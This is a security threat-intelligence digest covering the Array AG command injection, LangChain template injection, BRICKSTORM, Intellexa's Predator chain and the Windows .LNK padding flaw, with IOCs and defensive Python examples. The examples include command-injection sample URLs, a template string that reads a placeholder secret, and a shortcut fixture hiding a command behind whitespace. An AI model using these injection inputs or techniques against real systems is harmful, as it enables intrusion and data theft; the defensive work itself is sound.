JPCERT/CC has confirmed active command injection attacks against Array Networks AG Series secure access gateways, exploiting a vulnerability in the DesktopDirect feature, with activity observed since August 2025. The flaw, which has no CVE identifier at the time of writing, affects ArrayOS versions 9.4.5.8 and earlier and allows attackers to execute arbitrary commands and drop web shells; the observed attacks originated from the IP address 194.233.100[.]138. Array Networks had already shipped a fix on May 11, 2025, in ArrayOS version 9.4.5.9, roughly three months before the observed attacks began, so exposed devices are ones that were never updated. Users are advised to apply this update promptly; where that is not immediately possible, disabling the DesktopDirect service or applying URL filtering that denies requests whose URL contains a semicolon serves as a mitigation. A separate authentication bypass in the same product (CVE-2023-28461) was previously exploited by the China-linked MirrorFace group, but there is no current evidence connecting that group to these command injection incidents.
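The interim mitigation, denying any request whose URL contains a semicolon, only works if the filter inspects the URL after percent-decoding: `%3B` and the double-encoded `%253B` both reach the application as `;`. The following is an added example of such a filter decision, not Array Networks' or JPCERT/CC's code; the request paths are constructed and do not reproduce the exploit, and nothing here depends on the layout of DesktopDirect URLs.

```python
"""Semicolon URL filter with bounded decode normalization (added example)."""
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound the loop; real requests never need more than two


def normalize(url: str) -> tuple:
    """Percent-decode until the string stops changing, up to MAX_DECODE_ROUNDS.
    Returns (decoded_url, rounds_used) so the caller can also flag double
    encoding, which is suspicious in itself on a VPN gateway."""
    current, rounds = url, 0
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def decide(url: str) -> dict:
    """Apply the report's rule (block any URL containing ';') to the normalized form."""
    decoded, rounds = normalize(url)
    block = ";" in decoded
    reason = None
    if block:
        reason = "semicolon_in_url" if rounds <= 1 else f"semicolon_after_{rounds}_decode_rounds"
    elif rounds > 1:
        reason = "double_encoding_without_semicolon"  # not blocked by this rule, but worth logging
    return {"url": url, "decoded": decoded, "block": block, "reason": reason}


# Constructed request URLs; none is a real exploit path.
SAMPLE_REQUESTS = [
    "/some/app/path",
    "/some/app/path;id",
    "/some/app/path%3Bid",
    "/some/app/path%253Bid",
    "/login?next=%2Fhome",
]


def blocked_urls(urls: list) -> list:
    return [u for u in urls if decide(u)["block"]]


if __name__ == "__main__":
    for u in SAMPLE_REQUESTS:
        d = decide(u)
        print(f"{'BLOCK' if d['block'] else 'allow':5} {u:28} -> {d['decoded']:22} {d['reason'] or ''}")
```

Two caveats when translating this into a WAF or proxy rule. Semicolons are legal in URLs (path parameters such as `;jsessionid=` use them), so the rule is acceptable only because it is scoped to the gateway hosts, where legitimate clients do not send them. And the rule must be applied to the decoded URL the appliance will see, so confirm whether your filter normalizes before matching; if it does not, add explicit patterns for `%3B` and `%253B` as well.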
Severity: High
Sources:
https://buaq.net/go-379737.html
https://cyberpress.org/arrayos-ag-vpn-vulnerability/
https://gbhackers.com/arrayos-ag-vpn/
https://thecyberexpress.com/cve-2023-28461-jpcert-array-gateway-warning/
https://thehackernews.com/2025/12/jpcert-confirms-active-command.html
https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-arrayos-ag-vpn-flaw-to-plant-webshells/
Threat Details and IOCs
Malware: Agenda, Albiriox, PoisonPlug, Qilin, Sha1-Hulud, ShadowPad, Shai-Hulud
CVEs: CVE-2023-28461
Technologies: Array Networks AG Series, Array Networks ArrayOS, Array Networks vxAG, PHP
Threat Actors: APT10, Earth Kasha, MirrorFace
Attacker Countries: China
Attacker IPs: 194.233.100.138
Victim Industries: Aerospace, Defense, E-commerce, Education, Energy, Financial Services, Government, Healthcare, Information and Communication, Manufacturing, Multimedia, Public Sector, Semiconductors, Technology Hardware, Telecommunications, Utilities
Victim Countries: China, India, Japan, Taiwan, United States
Mitigation Advice
Update all Array Networks AG Series gateways to ArrayOS version 9.4.5.9 or a later version to remediate the command injection vulnerability.
If patching Array AG gateways to version 9.4.5.9 is not immediately feasible, disable the 'DesktopDirect' feature on all vulnerable devices.
Configure your perimeter firewall or Web Application Firewall (WAF) to block all inbound HTTP/HTTPS requests to Array AG gateways that contain a semicolon character (';') in the URL.
Add the IP address 194.233.100.138 to your network firewall's blocklist to deny all inbound and outbound traffic.
Scan the file systems of all Array AG gateways for indicators of compromise, such as recently created or modified web shell files (e.g., .php, .asp) in web-accessible directories.
Compliance Best Practices
Establish a formal patch management policy that mandates regular vulnerability scanning of all internet-facing systems and defines strict service-level agreements (SLAs) for applying critical security patches.
Implement a recurring configuration review process for all network security appliances to identify and disable any non-essential features and services, thereby minimizing the device's attack surface.
Design and implement a DMZ network segment for all internet-facing services, including secure access gateways, and enforce strict firewall rules that only permit essential, pre-approved traffic between the DMZ and the internal corporate network.
Configure all internet-facing appliances to forward detailed system, process, and network logs to a centralized SIEM, and develop detection rules to alert on anomalous file creation, command execution, and unusual outbound connections.
LangChain Prompt Template Injection Vulnerability: Property Access (CVE-2025-65106)
A prompt template injection vulnerability has been discovered in the LangChain `langchain-core` package, affecting versions up to `1.0.6` and `0.3.79`, with fixes in versions `1.0.7` and `0.3.80`. Identified as CVE-2025-65106 and GHSA-6qv9-48xg-fc7f, the flaw allows an attacker who controls a template string (as opposed to only the values substituted into it) to access Python object attributes, internal properties, and sensitive information, potentially escalating to more severe attacks. It affects the F-string, Mustache, and Jinja2 template formats, stemming respectively from attribute access in F-string fields, the `getattr()` fallback in the Mustache implementation, and insufficient sandboxing in Jinja2. Applications are at high risk if they accept untrusted template strings, dynamically construct prompts from user input, or allow users to customize or create prompt templates.
Remediation requires updating to the patched `langchain-core` versions, auditing code for any template strings that originate from untrusted sources, and keeping a clear separation between template structure and user-provided data. The fixes are format-specific: F-string validation now restricts replacement fields to simple Python identifiers, Mustache applies strict type checking that limits object traversal to dict, list, and tuple values, and Jinja2 rendering moves to a `_RestrictedSandboxedEnvironment` that blocks all attribute and method access.
Severity: High
Sources:
https://buaq.net/go-379721.html
Threat Details and IOCs
CVEs: CVE-2025-65106
Technologies: Jinja2, LangChain LangGraph, Python
Victim Industries: E-commerce, Financial Services, Healthcare, Legal Services, Retail, Software
Mitigation Advice
Update all instances of the `langchain-core` Python package to version 1.0.7 or 0.3.80 or newer to patch the template injection vulnerability (GHSA-6qv9-48xg-fc7f).
Audit your codebase to identify all applications using LangChain's `ChatPromptTemplate`. Prioritize remediation for any applications found to accept template strings from untrusted sources.
Compliance Best Practices
Enforce a secure coding standard for all AI/LLM applications that strictly separates the prompt template structure from user-provided data. Ensure that user input can only populate predefined variables within a static, developer-controlled template.
During application design and code reviews, challenge the necessity of using string-based prompt templating. Where possible, refactor applications to use direct message objects (e.g., `HumanMessage`, `AIMessage`) to eliminate the risk of template injection vulnerabilities.
Create a development policy that restricts the use of the Jinja2 template format (`template_format="jinja2"`) in LangChain to only those instances where the template content is hardcoded or originates from a fully trusted, internally-controlled source.
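The F-string variant of this bug and its fix are easy to see without LangChain installed, because F-string templating resolves to Python's own `str.format` machinery, which walks attributes and indexes on whatever object a replacement field names. The following is an added example, not langchain-core's code and not importing it: it shows the vulnerable rendering, the identifier-only validation that mirrors the fix class described above, and the design the compliance advice asks for (a constant template with untrusted text only ever supplied as a value). The `Secrets` class and its key string are constructed stand-ins.

```python
"""Template-string injection via str.format and the identifier-only fix (added example)."""
import re
import string

_IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


class Secrets:
    """Stand-in for an object that becomes reachable through a template variable."""
    api_key = "sk-constructed-placeholder"   # constructed; not a real credential

    def __str__(self) -> str:
        return "<Secrets>"  # what the developer expected {cfg} to render as


def render_untrusted(template: str, **variables) -> str:
    """Vulnerable: the template author chooses the field expressions, and
    str.format honours attribute and index traversal such as {cfg.api_key}."""
    return template.format(**variables)


def field_expressions(template: str):
    """Yield every replacement field in the template, e.g. 'cfg.api_key' or 'cfg[0]'."""
    for _literal, field, _spec, _conversion in string.Formatter().parse(template):
        if field is not None:
            yield field


def validate_template(template: str, declared_variables: set) -> None:
    """Reject any field that is not a plain identifier, and any identifier the
    caller did not declare. No '.', no '[', no positional or empty fields."""
    for field in field_expressions(template):
        if not _IDENTIFIER.match(field):
            raise ValueError(f"disallowed replacement field: {field!r}")
        if field not in declared_variables:
            raise ValueError(f"undeclared variable: {field!r}")


def render_validated(template: str, **variables) -> str:
    validate_template(template, set(variables))
    return template.format(**variables)


def is_rejected(template: str, **variables) -> bool:
    try:
        render_validated(template, **variables)
    except ValueError:
        return True
    return False


PROMPT = "User said: {user_input}"   # static, developer-owned structure


def build_prompt(user_input: str) -> str:
    """Safe design: the template is a constant and untrusted text is a value, so
    braces inside user_input are data and are never interpreted."""
    return render_validated(PROMPT, user_input=user_input)


if __name__ == "__main__":
    cfg = Secrets()
    print(render_untrusted("{cfg}", cfg=cfg))                      # <Secrets>
    print(render_untrusted("{cfg.api_key}", cfg=cfg))              # leaks the key
    print(render_untrusted("{cfg.__class__.__name__}", cfg=cfg))   # walks the object graph
    print(is_rejected("{cfg.api_key}", cfg=cfg))                   # True once validated
    print(build_prompt("{cfg.api_key}"))                           # braces stay literal
```

The validation only helps if the template string is the thing under the developer's control; if the product requirement is that users author templates, the Mustache and Jinja2 fixes in the advisory show the other two cases of the same problem, and the compliance advice to prefer message objects over string templating removes the class entirely.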
Chinese State-Sponsored Actors Deploy Brickstorm Backdoor in US Critical Networks for Years
Chinese state-sponsored actors, tracked as UNC5221 by Mandiant and Warp Panda by CrowdStrike, have maintained long-term access, in some cases for years, inside critical US networks, including at least eight government services and IT organizations and dozens of other entities across the legal, SaaS, business process outsourcing, technology, and manufacturing sectors. They deployed the cross-platform BRICKSTORM backdoor, which runs on Linux, VMware, and Windows systems, alongside two new Go-based implants: Junction, for VMware ESXi hosts, which listens on TCP port 8090, and GuestConduit, for guest VMs, which communicates over VSOCK on port 5555. Initial access was typically gained by exploiting internet-facing edge devices, followed by pivoting into vCenter environments using valid credentials or vulnerabilities. Once inside, the adversaries stole cryptographic keys from domain controllers and Active Directory Federation Services servers, accessed and exfiltrated sensitive data from Microsoft Azure environments (OneDrive, SharePoint, Exchange), and established persistence by registering new multi-factor authentication devices on compromised accounts. Warnings from CISA, the NSA, and the Canadian Centre for Cyber Security, together with reports from Google Threat Intelligence (Mandiant) and CrowdStrike, describe the ongoing threat and the actors' evolving techniques; Palo Alto Networks' Unit 42 is also tracking the activity.
Severity: Critical
Sources:
https://cy berpress.org/china-nexus-hackers/
https://federalnewsnetwork.com/cybersecurity/2025/12/agencies-it-companies-impacted-by-latest-malware-from-china/
https://gbhackers.com/vmware-vcenter-systems/
https://industrialcyber.co/cisa/cisa-nsa-sound-alarm-on-brickstorm-backdoor-used-by-china-linked-actors-targeting-vmware-windows-systems/
https://securitybrief.asia/story/warp-panda-cyberespionage-group-targets-us-cloud-networks
https://thecyberexpress.com/cisa-prc-hackers-target-vmware-with-brickstorm/
https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html
https://www.bleepingcomputer.com/news/security/cisa-warns-of-chinese-brickstorm-malware-attacks-on-vmware-servers/
https://www.cisa.gov/news-events/alerts/2025/12/04/prc-state-sponsored-actors-use-brickstorm-malware-across-public-sector-and-information-technology
https://www.cisa.gov/news-events/analysis-reports/ar25-338a
https://www.cisa.gov/news-events/news/cisa-nsa-and-cyber-centre-warn-critical-infrastructure-brickstorm-malware-used-peoples-republic
https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/
https://www.darkreading.com/cyberattacks-data-breaches/cisa-ongoing-brickstorm-backdoor-attacks
https://www.hendryadrian.com/cisa-warns-of-chinese-brickstorm-malware-attacks-on-vmware-servers/
https://www.infosecurity-magazine.com/news/chinalinked-warp-panda/
https://www.safebreach.com/blog/safebreach-coverage-for-updated-cisa-ar25-338a-brickstorm-backdoor/
https://www.securityweek.com/us-organizations-warned-of-chinese-malware-used-for-long-term-persistence/
https://www.theregister.com/2025/12/04/prc_spies_brickstrom_cisa/
Threat Details and IOCs
Malware: BRICKSTEAL, BRICKSTORM, GuestConduit, Junction, RESURGE, SPAWN, SPAWNANT, SPAWNCHIMERA, SPAWNMOLE, SPAWNSNAIL, ZIPLINE
CVEs: CVE-2021-22005, CVE-2023-34048, CVE-2023-46747, CVE-2023-46805, CVE-2023-4966, CVE-2024-21887, CVE-2024-21893, CVE-2024-38812, CVE-2025-0282, CVE-2025-22457
Technologies: BSD, F5 BIG-IP, Ivanti Connect Secure, Ivanti Policy Secure, Linux, Microsoft 365, Microsoft Active Directory, Microsoft Azure, Microsoft Windows, Microsoft Windows Server, VMware ESXi, VMware vCenter Server, VMware vSphere
Threat Actors: RedDev61, UNC5221, UTA0178, Warp Panda
Attacker Countries: China
Attacker IPs: 1.0.0.1, 1.1.1.1, 149.112.112.11, 149.112.112.112, 149.28.120.31, 208.83.233.14, 45.90.28.160, 45.90.30.160, 8.8.4.4, 8.8.8.8, 9.9.9.11, 9.9.9.9
Attacker URLs: https://1.0.0.1/dns-query, https://1.1.1.1/dns-query, https://149.112.112.112/dns-query, https://149.112.112.11/dns-query, https://45.90.28.160/dns-query, https://45.90.30.160/dns-query, https://8.8.4.4/dns-query, https://8.8.8.8/dns-query, https://9.9.9.11/dns-query, https://9.9.9.9/dns-query
Note on the address and URL lists: every URL above, and ten of the twelve IPs (1.0.0.1, 1.1.1.1, 8.8.4.4, 8.8.8.8, 9.9.9.9, 9.9.9.11, 149.112.112.11, 149.112.112.112, 45.90.28.160, 45.90.30.160), are public DNS-over-HTTPS resolver endpoints operated by Cloudflare, Google, Quad9, and NextDNS. They appear because BRICKSTORM resolves its command-and-control names over DoH; they are not attacker-controlled and blocklisting them wholesale will break legitimate DoH clients. Treat them as telemetry instead: vCenter servers, ESXi hosts, domain controllers, and ADFS servers have no reason to contact a public resolver over port 443, so such connections from those hosts are a high-value alert.
Attacker Hashes: 013211c56caaa697914b5b5871e4998d0298902e336e373ebb27b7db30917eaf, 0a4fa52803a389311a9ddc49b7b19138, 10d811029f6e5f58cd06143d6353d3b05bc06d0f, 18f895e24fe1181bb559215ff9cf6ce3, 22c15a32b69116a46eb5d0f2b228cc37cd1b5915a91ec8f38df79d3eed1da26b, 320a0b5d4900697e125cebb5ff03dee7368f8f087db1c1570b0b62f5a986d759, 39111508bfde89ce6e0fe6abe0365552, 39b3d8a8aedffc1b40820f205f6a4dc041cd37262880e5030b008175c45b0c46, 40992f53effc60f5e7edea632c48736ded9a2ca59fb4924eb6af0a078b74d557, 40db68331cb52dd3ffa0698144d1e6919779ff432e2e80c058e41f7b93cec042, 44a3d3f15ef75d9294345462e1b82272b0d11985, 4c52caf2e5f114103ed5f60c6add3aa26c741b07869bb66e3c25a1dc290d4a8bf87c42c336e8ac8ebf82d9a9b23eaa18c31f7051a5970a8fe1125a2da890340f, 57bd98dbb5a00e54f07ffacda1fea91451a0c0b532cd7d570e98ce2ff741c21d, 5e654776e9c419e11e6f93a452415a601bd9a2079710f1074608570e498a9af37b81bb57c98cb8bb626c5ee4b3e35757d3ae8c1c3717f28d9f3fe7a4cebe0608, 659205fa2cfa85e484c091cc2e85a7ec4e332b196e423b1f39bafdc8fca33e3db712bbe07afcc091ff26d9b4f641fa9a73f2a66dce9a0ced54ebeb8c2be82a7f, 65ebf5dfafb8972ffead44271436ec842517cfaaf3d1f1f1237a32d66e1d280943bd3a69f1d539a1b7aca6152e96b29bc822e1047e2243f6aec8959595560147, 73fe8b8fb4bd7776362fd356fdc189c93cf5d9f6724f6237d829024c10263fe5, 74b4c6f7c7cae07c6f8edf3f2fb1e9206d4f1f9734e8e4784b15d192eec8cd8a4f59078fc0c56dc4ad0856cdd792337b5c92ffd3d2240c8a287a776df4363bba, 79276523a6a507e3fa1b12b96e09b10a01c783a53d58b9ae7f5780a379431639a80165e81154522649b8e2098e86d1a310efffebe32faafc7b3bc093eec60a64, 82bf31e7d768e6d4d3bc7c8c8ef2b358, 88db1d63dbd18469136bf9980858eb5fc0d4e41902bf3e4a8e08d7b6896654ed, 8e29aeb3603ffe307b2d60f7401bd9978bebe8883235eb88052ebf6b9e04ce6bf35667480cedea5712c1e13e8c6dcfb34d5fde0ddca6ca31328de0152509bf8f, 8e4c88d00b6eb46229a1ed7001451320, 97001baaa379bcd83677dca7bc5b8048fdfaaddc, 9a0e1b7a5f7793a8a5a62748b7aa4786d35fc38de607fb3bb8583ea2f7974806, 9bf4c786ebd68c0181cfe3eb85d2fd202ed12c54, a02469742f7b0bc9a8ab5e26822b3fa8, a52e36a70b5e0307cbcaa5fd7c97882c, aaf5569c8e349c15028bc3fac09eb982efb06eabac955b705a6d447263658e38, b3b6a992540da96375e4781afd3052118ad97cfe60ccf004d732f76678f6820a, b91881cb1aa861138f2063ec130b2b01a8aaf0e3f04921e5cbfc61b09024bf12, bbe18d32bef66ccfa931468511e8ba55b32943e47a1df1e68bb5c8f8ae97a5bf991201858ae9632fa24df5f6c674b6cb260297a1c11889ca61bda68513f440ce, bfb3ffd46b21b2281374cd60bc756fe2dcc32486dcc156c9bd98f24101145454, c3549d4e5e39a11f609fc6fbf5cc1f2c0ec272b4, dbca28ad420408850a94d5c325183b28, de28546ec356c566cd8bca205101a733e9a4a22d, dfac2542a0ee65c474b91d3b352540a24f4e223f1b808b741cfe680263f0ee44, f639d9404c03af86ce452db5c5e0c528b81dc0d7, f7cda90174b806a34381d5043e89b23ba826abcc89f7abd520060a64475ed506, fb11c6caa4ea844942fe97f46d7eb42bc76911ab
Victim Industries: Business Process Outsourcing, Critical Manufacturing, Facilities Services, Government, Information Technology, Legal Services, Manufacturing, Public Sector, Software as a Service (SaaS), Technology Hardware
Victim Countries: Australia, Austria, Canada, Germany, Greece, Mexico, New Zealand, United Kingdom, United States
Mitigation Advice
Download and run the open-source Brickstorm scanner from Mandiant's GitHub repository on all Linux, VMware, and Windows environments, prioritizing vCenter servers.
Scan VMware ESXi hosts for the 'Junction' implant (listening on TCP port 8090) and monitor for suspicious processes masquerading as legitimate VMware services.
Scan guest VMs within your VMware environment for the 'GuestConduit' implant, paying close attention to unusual VSOCK listener activity on port 5555.
Immediately scan all internet-facing edge devices for vulnerabilities and apply all available security patches, prioritizing any devices with known exploits.
Audit all Microsoft 365 and Azure AD accounts for any recently registered MFA devices and verify the legitimacy of each new registration with the account owner.
Review Microsoft 365 audit logs for anomalous access patterns to OneDrive, SharePoint, and Exchange Online, specifically looking for session replay activity or access from unusual IP addresses or locations.
Compliance Best Practices
Implement network segmentation to create isolated security zones for critical assets like VMware vCenter servers, ESXi hosts, and Domain Controllers, restricting access from less secure network segments.
Enforce the principle of least privilege for all accounts, especially service accounts and administrative accounts, ensuring they only have the minimum permissions necessary to perform their functions on systems like vCenter and Active Directory.
Implement a default-deny egress filtering policy on the network firewall, allowing outbound traffic only for explicitly approved protocols, ports, and destinations to disrupt command-and-control communications.
Enhance security logging for critical systems, including VMware vCenter, ESXi hosts, Domain Controllers, and ADFS servers. Forward these logs to a SIEM and develop correlation rules to detect lateral movement and credential access techniques.
Strengthen MFA policies by requiring re-authentication for sensitive actions such as registering a new MFA device, and enforce phishing-resistant MFA for all administrative and privileged accounts.
Intellexa Deployed Predator Spyware via iOS Zero-Day Exploit Chain Against Egyptian Targets

Sanctioned commercial surveillance vendor Intellexa deployed a three-stage iOS zero-day exploit chain, internally codenamed "smack," against targets in Egypt to install its Predator spyware. The initial stage leveraged a Safari remote code execution zero-day (CVE-2023-41993), which Google assessed Intellexa likely acquired externally due to its use of the "JSKit" framework, previously observed in attacks by other surveillance vendors and Russian government-backed actors. The second stage achieved sandbox escape and privilege escalation by exploiting kernel vulnerabilities CVE-2023-41991 and CVE-2023-41992, providing kernel memory read/write capabilities. The final stage, PREYHUNTER, comprised "helper" and "watcher" modules; the "watcher" module performed anti-detection by monitoring for security tools, specific locale settings, and other anomalies, while the "helper" module used custom frameworks (DMHooker, UMHooker) to hook system functions for VOIP recording, keylogging, and camera capture, also hiding notifications. Intellexa has been linked to 15 zero-day vulnerabilities since 2021, including several Chrome V8 engine exploits (CVE-2021-38003, CVE-2023-4762, CVE-2023-3079, CVE-2023-2033, CVE-2025-6554) observed in Saudi Arabia. Google Threat Intelligence Group and CitizenLab collaborated on this discovery, leading Google to issue warnings to Intellexa's customers across multiple countries and add associated domains to Safe Browsing.

Severity: Critical

Sources
https://gbhackers.com/ios-zero-day/
https://thecyberexpress.com/ios-zero-day-exploit-chain-egypt/

Threat Details and IOCs
Malware: Alien, ALIEN, Nova, Predator, PREYHUNTER
CVEs: CVE-2021-38003, CVE-2022-42856, CVE-2023-2033, CVE-2023-3079, CVE-2023-41991, CVE-2023-41992, CVE-2023-41993, CVE-2023-4762, CVE-2025-6554
Technologies: Apple iOS, Apple Safari, Google Chrome
Threat Actors: Intellexa
Attacker Countries: Russia
Attacker Hashes: 85d8f504cadb55851a393a13a026f1833ed6db32cb07882415e029e709ae0750, e3314bcd085bd547d9b977351ab72a8b83093c47a73eb5502db4b98e0db42cac
Victim Industries: Government, Multimedia, Technology Hardware
Victim Countries: Angola, Egypt, Kazakhstan, Mongolia, Pakistan, Saudi Arabia, Tajikistan, Uzbekistan

Mitigation Advice
Update all corporate and BYOD iOS devices to the latest available OS version to mitigate vulnerabilities CVE-2023-41993, CVE-2023-41991, and CVE-2023-41992.
Ensure all Google Chrome and Chromium-based browsers on corporate endpoints are updated to the latest version to protect against CVE-2021-38003, CVE-2023-4762, CVE-2023-3079, CVE-2023-2033, and CVE-2025-6554.
Scan managed mobile devices for the presence of unauthorized security research tools such as Bash, tcpdump, frida, sshd, or checkra1n, as these can be indicators of compromise or reconnaissance.
Audit managed mobile devices for unauthorized custom HTTP proxy configurations and non-corporate root certificate installations.

Compliance Best Practices
Implement or enhance a Mobile Device Management (MDM) solution to enforce mandatory and timely OS and application updates on all mobile devices accessing corporate data.
Develop and enforce a security policy that enables Apple's Lockdown Mode on iOS devices used by executives and other employees at high risk of being targeted by sophisticated spyware.
Establish a continuous security awareness training program that educates users on how to identify and report phishing attempts and suspicious links on mobile devices.
Implement and maintain network egress filtering to block outbound connections from all corporate devices to known malicious domains and uncategorized websites.
Use MDM to establish and enforce a policy that prohibits the use of Developer Mode on all corporate-managed iOS devices unless there is a documented and approved business justification.

Microsoft Patches Critical Windows .LNK Flaw (CVE-2025-9491) Exploited by State-Sponsored Groups

Microsoft has addressed a critical Windows shortcut file (.lnk) vulnerability, tracked as CVE-2025-9491 (ZDI-CAN-25373), which allowed malicious .lnk files to conceal harmful command-line arguments, enabling hidden code execution. This flaw, exploited by at least 11 state-sponsored groups from North Korea, Iran, Russia, and China since 2017 for cyber espionage and data theft, involved padding commands with whitespace to make the "Target" field appear innocuous in Windows properties. Despite initially downplaying its severity, Microsoft issued a "silent mitigation" in its November 2025 Patch Tuesday, which now reveals the full command in the "Properties" dialog. The fix follows a recent campaign by the China-linked UNC6384/Mustang Panda group, which leveraged CVE-2025-9491 in spear-phishing attacks against European diplomatic entities, deploying the PlugX remote access trojan. The .lnk format remains a significant threat due to its ability to bypass email filters and facilitate remote code execution through social engineering, and the risk persists until all vulnerable systems are updated.
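A defender-side check for the padding trick described above, added here as an example and not code from the report, from Microsoft, or from any of the cited sources: it reads a shortcut's StringData following the MS-SHLLINK layout, measures the longest run of whitespace in COMMAND_LINE_ARGUMENTS, and reports what sat before the padding (the part the Properties dialog showed) and what came after it. The 32-character threshold and the `build_lnk` test fixture are assumptions made for this example.

```python
"""Flag Windows shortcut (.lnk) files whose command-line arguments hide a command behind a long
run of whitespace, the CVE-2025-9491 trick. Added detection example: the parser follows the
MS-SHLLINK StringData layout; the fixture in build_lnk is constructed, not a real sample."""
import struct

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
PAD_CHARS = " \t\r\n\x0b\x0c"  # space, tab, CR, LF, vertical tab, form feed
PAD_THRESHOLD = 32  # assumed for the example; benign argument strings never carry this much padding


def _read_string(data, pos, unicode):
    """One StringData item: CountCharacters (u16) followed by that many characters."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        return data[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return data[pos:pos + count].decode("cp1252", errors="replace"), pos + count


def parse_lnk(data):
    """Return the StringData fields present in the shortcut."""
    if (len(data) < HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip LinkTargetIDList: u16 size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo: u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[name], pos = _read_string(data, pos, unicode)
    return fields


def inspect_arguments(arguments, threshold=PAD_THRESHOLD):
    """Find the longest run of padding characters and split the string around it."""
    best_start = best_len = 0
    run_start = None
    for i, ch in enumerate(arguments + "\x00"):  # sentinel closes a trailing run
        if ch in PAD_CHARS:
            if run_start is None:
                run_start = i
        elif run_start is not None:
            if i - run_start > best_len:
                best_start, best_len = run_start, i - run_start
            run_start = None
    suspicious = best_len >= threshold
    return {
        "suspicious": suspicious,
        "longest_run": best_len,
        # what the Properties dialog showed versus what actually ran
        "visible": arguments[:best_start].rstrip() if suspicious else arguments,
        "hidden": arguments[best_start + best_len:] if suspicious else "",
    }


def scan_lnk(data, threshold=PAD_THRESHOLD):
    """Parse one shortcut and report its padding findings plus the target it points at."""
    fields = parse_lnk(data)
    result = inspect_arguments(fields.get("arguments", ""), threshold)
    result["relative_path"] = fields.get("relative_path", "")
    return result


def build_lnk(arguments, relative_path="..\\..\\Windows\\System32\\cmd.exe"):
    """Constructed test fixture: a minimal Unicode shortcut carrying only the
    RELATIVE_PATH and COMMAND_LINE_ARGUMENTS StringData items."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20,        # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # creation / access / write FILETIMEs
                         0, 0,        # FileSize, IconIndex
                         1,           # ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    print(scan_lnk(build_lnk("/c echo hello" + " " * 300 + "& echo hidden")))  # constructed
```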
Severity: Critical

Sources
https://blog.0patch.com/2025/12/microsoft-silently-patched-cve-2025.html
https://cyberpress.org/microsoft-windows-lnk-vulnerability/
https://dataconomy.com/2025/11/24/why-that-harmless-looking-desktop-icon-might-actually-be-a-weapon/
https://gbhackers.com/hackers-actively-exploit-new-windows-lnk-0-day/
https://it.slashdot.org/story/25/12/04/1744255/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day?utm_source=rss1.0mainlinkanon&utm_medium=feed
https://meterpreter.org/microsoft-finally-patches-lnk-flaw-cve-2025-9491-exploited-by-spies-since-2017/
https://thehackernews.com/2025/12/microsoft-silently-patches-windows-lnk.html
https://www.bleepingcomputer.com/news/microsoft/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day/
https://www.hendryadrian.com/microsoft-mitigates-windows-lnk-flaw-exploited-as-zero-day/
https://www.techrepublic.com/article/news-microsoft-fixes-security-flaw/
https://www.theregister.com/2025/12/04/microsoft_lnk_bug_fix/

Threat Details and IOCs
Malware: CirenegRAT, C_Major, Destroy RAT, DestroyRAT, Dreambot, Farfli, Gh0st, Gh0st RAT, Ghost RAT, Gozi, Gozi-ISFB, HiddenGh0st, Hodur, ISFB, Kaba, Konni, KONNI, Korplug, LDR4, Moudour, Papras, PCrat, PCRat, PlugX, QNAP-Worm, Raspberry Robin, Roshtyak, Snifula, Sogu, SOGU, Storm-0856, SugarGh0st RAT, TheTrick, TIGERPLUG, Trickbot, TrickBot, TrickLoader, Trickster, UpDog, Ursnif, UsrRunVGA.exe, XDigo
CVEs: CVE-2025-9491
Technologies: Microsoft Windows, Microsoft Windows Server
Threat Actors: APT10, APT15, APT17, APT20, APT21, APT22, APT26, APT27, APT3, APT31, APT37, APT40, APT41, APT43, Barium, Bitter, BronzePresident, BronzeUnion, Daggerfly, DoubleDragon, DragonOK, EarthIktomi, EarthLusca, EarthPreta, EmissaryPanda, EvilCorp, HazyTiger, Hellsing, HurricanePanda, Kimsuky, Konni, LuckyMouse, MenuPass, MUSTANGPANDA, OpalSleet, RazorTiger, RedDelta, RedHotel, SadFuture, SAMURAIPANDA, Sidewinder, TA416, TA505, TEMPHex, TwillTyphoon, UNC1878, UNC6384, VelvetAnt, WaterPoukai, WickedPanda, WickedSpider, WIZARDSPIDER, XDSpy
Attacker Countries: China, India, Iran, North Korea, Russia
Attacker IPs: 195.154.152.70
